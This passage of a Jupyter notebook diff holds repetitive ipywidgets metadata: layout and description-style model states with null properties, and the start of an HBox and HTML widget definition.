"_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "5abc6dd6fc8a42cfac748645d7d5120d": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "f0571918d4964cb0a4e8c78b7dc5b81d": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "ee01fb5c76c6479a9764e8e8c7deeb24": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "dd9432faf01e49f7b645575d9422a4df": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "b11bbb17f64a4cb88670c3251361abc1": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "008431306c25440584e45566ef6e2ef3": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "5b64a9e9922f406f8834ebac63a09ca8": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "682288ea4e1440d3974262dfffefc51a": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "8dfc8df4b9f241cf901c3fbb86554cd8": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "68a0bbe8687e4db9b87542ef7023345f": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "70a89485f8eb4c9680ccdb6e20041f65": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "6009ba22e5134b42a48038970f8a8087": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "25374e0a7ab5466bbcedf7cf15974c4f": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "3be07a9a36c14e609506a8d2ac30439a": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "e43a24fb4e5c4fdcb39febd5fb66ab45": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "13942a8909f945c395d55f92033505ff": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "51fc19877c544160ba1f98487b04d612": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "eedd93a671824bde815adb53be8171d4": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "b02ed3fb150a4688b13ebcde50c08ffb": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "e03e968d53544e44bb8aee7f544f1bb7": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "c4e4e8e3c9d748ffb96f74c1e7d06456": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "6e467383b0df416ea690cbd818bceba2": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "f4e0a99311504204a79f48de9ec95280": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "d8fffd09966f40cd8f443d6083121fbf": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "2fa658f90da941b6a590c278c67e548e": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "32a25d57545340c18731eb25a79e8b47": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "f0da6d221d02448bba7dc60802325cfd": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "e17a16c5dc694b899e1e44f3be7583e5": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "bd92677245d34eaa9245935dd5a20932": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "4b9b4d011c1c4ccc886e6141ce25f235": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "74a8b740324c4efead37803b886a7921": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "56fcef4dc65e40e087bbb2821874af17": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "8673a30c6d5a4f419020438fd49b2859": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "346c028bf83344f6b6b4ac47d243a3f0": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "574170a8682d444abdb3a4762b7fc0e5": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "58b355bd18364678a41ca309605018a5": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "8f02fdb7148e4970b349c624f4bdf198": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "bf52704eb9744bc996a1f98bb2b1698d": { + "model_module": "@jupyter-widgets/base", + "model_name": "LayoutModel", + "model_module_version": "1.2.0", + "state": { + "_model_module": "@jupyter-widgets/base", + "_model_module_version": "1.2.0", + "_model_name": "LayoutModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "LayoutView", + "align_content": null, + "align_items": null, + "align_self": null, + "border": null, + "bottom": null, + "display": null, + "flex": null, + "flex_flow": null, + "grid_area": null, + "grid_auto_columns": null, + "grid_auto_flow": null, + "grid_auto_rows": null, + "grid_column": null, + "grid_gap": null, + "grid_row": null, + "grid_template_areas": null, + "grid_template_columns": null, + "grid_template_rows": null, + "height": null, + "justify_content": null, + "justify_items": null, + "left": null, + "margin": null, + "max_height": null, + "max_width": null, + "min_height": null, + "min_width": null, + "object_fit": null, + "object_position": null, + "order": null, + "overflow": null, + "overflow_x": null, + "overflow_y": null, + "padding": null, + "right": null, + "top": null, + "visibility": null, + "width": null + } + }, + "a2855718cc134441a42da59e40da45b7": { + "model_module": "@jupyter-widgets/controls", + "model_name": "DescriptionStyleModel", + "model_module_version": "1.5.0", + "state": { + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "DescriptionStyleModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/base", + "_view_module_version": "1.2.0", + "_view_name": "StyleView", + "description_width": "" + } + }, + "b49ac81502e049ff8c2306bb2b649c9b": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HBoxModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HBoxModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": "1.5.0", + "_view_name": "HBoxView", + "box_style": "", + "children": [ + "IPY_MODEL_46c4c21d611e4fd591fa5f7c35854240", + "IPY_MODEL_c7f6a1a793f540f7b455e6e5c333e784", + "IPY_MODEL_dc26ec5c563e4d8894d2e8597326a451" + ], + "layout": "IPY_MODEL_bfb1e9039ae14006b3ce1f52e37361c0" + } + }, + "46c4c21d611e4fd591fa5f7c35854240": { + "model_module": "@jupyter-widgets/controls", + "model_name": "HTMLModel", + "model_module_version": "1.5.0", + "state": { + "_dom_classes": [], + "_model_module": "@jupyter-widgets/controls", + "_model_module_version": "1.5.0", + "_model_name": "HTMLModel", + "_view_count": null, + "_view_module": "@jupyter-widgets/controls", + "_view_module_version": 